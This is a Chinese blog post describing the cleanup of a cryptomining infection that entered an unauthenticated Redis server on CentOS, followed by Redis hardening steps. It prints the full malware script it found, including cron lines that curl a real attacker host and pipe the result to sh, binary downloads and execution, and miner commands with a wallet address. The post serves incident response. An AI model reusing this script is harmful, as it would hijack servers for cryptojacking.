CentOS7安装redis被AnXqV挖矿程序入侵

发表于： 2017年1月31日 2018年7月26日
分类： Linux

写程序的时候，发现redis异常，程序启动死慢，用top命令查看了一下，cpu被占用接近100%
发生原因：在centos上安装redis并且启动没有进行权限设置 这非常危险

Redis 未授权访问缺陷可轻易导致系统被黑 Sebug 公布了 Redis 未授权访问缺陷的详细漏洞信息，这个 Redis 未授权访问缺陷可轻易导致系统被黑。
漏洞详情：blog.jobbole.com/94518/
最佳解决方案提问(US)：http://security.stackexchange.com/questions/129448/how-can-i-kill-minerd-malware-on-an-aws-ec2-instance

I found the solution to removing minerd. I was lucky enough to find the actual script that was used to infect my server. All I had to do was remove the elements placed by this script –

On monkeyoto‘s suggestion, I blocked all communication with the mining pool server – iptables -A INPUT -s xmr.crypto-pool.fr -j DROP and iptables -A OUTPUT -d xmr.crypto-pool.fr -j DROP.
Removed the cron */15 * * * * curl -fsSL https://r.chanstring.com/api/report?pm=0706 | sh from /var/spool/cron/root and /var/spool/cron/crontabs/root.
Removed the directory /opt/yam.
Removed /root/.ssh/KHK75NEOiq.
Deleted the files /opt/minerd and /opt/KHK75NEOiq33.
Stopped the minerd process – pkill minerd.
Stopped lady – service lady stop.

I ran ps -eo pcpu,args --sort=-%cpu | head, top -bn2 |sed -n '7,25'p and ps aux | grep minerd after that and the malware was nowhere to be seen.

I still need to figure out how it gained access into the system but I was able to disable it this way.

首先保持冷静 先关掉您的redis

ps -ef | grep AnXqV 找到进程并kill 进程这时你发现没什么卵用过没多久病毒又自启动了

这时我执行crontab -l 命令查看定时任务

*/5 * * * * curl -fsSL http://www.haveabitchin.com/pm.sh?0129 | sh

执行了定时任务删除所有的执行计划 crontab -r

再将 /var/spool/cron/crontabs/root 文件内的入侵任务删除

完整执行代码 #本入侵代码可能会随时变化

iptables -A INPUT -s xmr.crypto-pool.fr -j DROP
iptables -A OUTPUT -d xmr.crypto-pool.fr -j DROP
crontab -r #如果您还有其他定时任务执行 请不要使用该命令 请修改定时任务删除入侵所在行
vi /var/spool/cron/crontabs/root #删除入侵行代码 :wq
service lady stop

这时可以轻松看到病毒shell

export PATH=$PATH:/bin:/usr/bin:/usr/local/bin:/usr/sbin

echo "*/5 * * * * curl -fsSL http://www.haveabitchin.com/pm.sh?0129 | sh" > /var/spool/cron/root
mkdir -p /var/spool/cron/crontabs
echo "*/5 * * * * curl -fsSL http://www.haveabitchin.com/pm.sh?0129 | sh" > /var/spool/cron/crontabs/root

if [ ! -f "/tmp/ddg.219" ]; then
    curl -fsSL http://www.haveabitchin.com/ddg.$(uname -m) -o /tmp/ddg.219
fi
chmod +x /tmp/ddg.219 && /tmp/ddg.219

CleanTail()
{
    ps auxf|grep -v grep|grep /tmp/duckduckgo|awk '{print $2}'|xargs kill -9
    ps auxf|grep -v grep|grep "/usr/bin/cron"|awk '{print $2}'|xargs kill -9
    ps auxf|grep -v grep|grep "/opt/cron"|awk '{print $2}'|xargs kill -9
    ps auxf|grep -v grep|grep "/usr/sbin/ntp"|awk '{print $2}'|xargs kill -9
    ps auxf|grep -v grep|grep "/opt/minerd"|awk '{print $2}'|xargs kill -9
    ps auxf|grep -v grep|grep "mine.moneropool.com"|awk '{print $2}'|xargs kill -9
    ps auxf|grep -v grep|grep "xmr.crypto-pool.fr:8080"|awk '{print $2}'|xargs kill -9
}

DoYam()
{
    if [ ! -f "/tmp/AnXqV.yam" ]; then
        curl -fsSL http://www.haveabitchin.com/yam -o /tmp/AnXqV.yam
    fi
    chmod +x /tmp/AnXqV.yam
    /tmp/AnXqV.yam -c x -M stratum+tcp://47sghzufGhJJDQEbScMCwVBimTuq6L5JiRixD8VeGbpjCTA12noXmi4ZyBZLc99e66NtnKff34fHsGRoyZk3ES1s1V4QVcB.01c32d313b74a859b904079c69dbc04ea6e37eddcf4aeb34e9400cc12831da54:x@xmr.crypto-pool.fr:443/xmr
}

DoMiner()
{
    if [ ! -f "/tmp/AnXqV" ]; then
        curl -fsSL http://www.haveabitchin.com/minerd -o /tmp/AnXqV
    fi
    chmod +x /tmp/AnXqV
    /tmp/AnXqV -B -a cryptonight -o stratum+tcp://xmr.crypto-pool.fr:443 -u 47sghzufGhJJDQEbScMCwVBimTuq6L5JiRixD8VeGbpjCTA12noXmi4ZyBZLc99e66NtnKff34fHsGRoyZk3ES1s1V4QVcB.01c32d313b74a859b904079c69dbc04ea6e37eddcf4aeb34e9400cc12831da54 -p x
}
ps auxf|grep -v grep|grep "4Ab9s1RRpueZN2XxTM3vDWEHcmsMoEMW3YYsbGUwQSrNDfgMKVV8GAofToNfyiBwocDYzwY5pjpsMB7MY8v4tkDU71oWpDC"|awk '{print $2}'|xargs kill -9
ps auxf|grep -v grep|grep "47sghzufGhJJDQEbScMCwVBimTuq6L5JiRixD8VeGbpjCTA12noXmi4ZyBZLc99e66NtnKff34fHsGRoyZk3ES1s1V4QVcB+01c32d313b74a859b904079c69dbc04ea6e37eddcf4aeb34e9400cc12831da54"|awk '{print $2}'|xargs kill -9
ps auxf|grep -v grep|grep "AnXqV" || DoMiner
ps auxf|grep -v grep|grep "AnXqV" || DoYam

这个病毒并没有硬把我的系统搞瘫痪监控内存情况还是比较乐观的

下面应当对redis的后门进行修复设置如上的解决方案治标不治本除非你不用redis了

设置redis设置

1、设置auth密码并修改端口号进入redis安装目录

cd /home/redis-2.8.17/src/
vi redis.conf
###
port 110
requirepass mypassword
### :wq
./redis-server ./redis.conf &

当使用./redis-cli控制台的时候先输入校验如果改变端口号了加 -p参数进入
auth mypassword

redis config配置说明 http://www.runoob.com/redis/redis-conf.html

           _.-``__ ''-._                                             
      _.-``    `.  `_.  ''-._           Redis 2.8.17 (00000000/0) 64 bit
  .-`` .-```.  ```\/    _.,_ ''-._                                   
 (    '      ,       .-`  | `,    )     Running in stand alone mode
 |`-._`-...-` __...-.``-._|'` _.-'|     Port: 110
 |    `-._   `._    /     _.-'    |     PID: 1754
  `-._    `-._  `-./  _.-'    _.-'                                   
 |`-._`-._    `-.__.-'    _.-'_.-'|                                  
 |    `-._`-._        _.-'_.-'    |           http://redis.io        
  `-._    `-._`-.__.-'_.-'    _.-'                                   
 |`-._`-._    `-.__.-'    _.-'_.-'|                                  
 |    `-._`-._        _.-'_.-'    |                                  
  `-._    `-._`-.__.-'_.-'    _.-'                                   
      `-._    `-.__.-'    _.-'                                       
          `-._        _.-'                                           
              `-.__.-'

如果本篇文章对您有帮助，请关注本人Github 举手之劳感谢
https://github.com/okfirelee

admin

1009